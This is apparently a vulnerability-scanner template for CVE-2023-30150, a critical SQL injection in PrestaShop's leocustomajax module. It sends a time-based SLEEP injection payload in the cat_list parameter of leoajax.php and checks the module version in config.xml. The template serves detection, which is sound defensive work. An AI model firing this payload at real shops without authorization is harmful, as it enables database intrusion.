id: CVE-2023-30150

info:
  name: PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php
  author: mastercho
  severity: Critical
  description: |
    Multiple SQL injection vulnerabilities in the Leo Custom Ajax (leocustomajax) module from LeoTheme for PrestaShop, in version 1.0, allow remote attackers to execute arbitrary SQL commands.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30150
    - https://security.friendsofpresta.org/module/2023/06/06/leocustomajax.html
    - https://www.tenable.com/cve/CVE-2023-30150
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-30150
    cwe-id: CWE-89
  tags: cve,cve2023,prestashop,prestashop-module,sqli
  metadata:
    max-request: 1

http:

  - raw:
      - |
        @timeout: 16s
        GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(8)))a) HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /modules/leocustomajax/config.xml HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: version
        part: body_1
        internal: true
        group: 1
        regex:
          - "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=8'
          - 'status_code_2 == 200 && compare_versions(version, "= 1.0") && compare_versions(version, "= 1.0.0")'
        condition: or